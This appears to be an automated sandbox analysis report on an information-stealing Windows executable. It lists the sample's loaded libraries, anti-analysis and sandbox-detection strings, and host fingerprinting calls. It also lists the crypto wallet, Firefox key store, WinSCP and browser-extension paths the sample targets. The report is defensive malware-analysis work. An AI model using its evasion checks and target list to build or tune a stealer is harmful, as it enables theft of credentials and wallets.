                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: dbghelp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: gVKsiQIHqe.exeStatic PE information: section name: .00cfg

                  Boot Survival

                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

                  Malware Analysis System Evasion

                  Source: gVKsiQIHqe.exeBinary or memory string: DIR_WATCH.DLL
                  Source: gVKsiQIHqe.exeBinary or memory string: SBIEDLL.DLL
                  Source: gVKsiQIHqe.exeBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: gVKsiQIHqe.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeEvaded block: after key decisiongraph_0-14793
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12848
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW``
                  Source: Web Data.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: Web Data.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Web Data.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Web Data.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Web Data.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Web Data.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Web Data.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Web Data.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Web Data.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Web Data.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Web Data.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Web Data.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: Web Data.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Web Data.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-13070
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-12446
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: gVKsiQIHqe.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: window-state.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: exodus.conf.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: passphrase.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: nomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: seed.seco
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
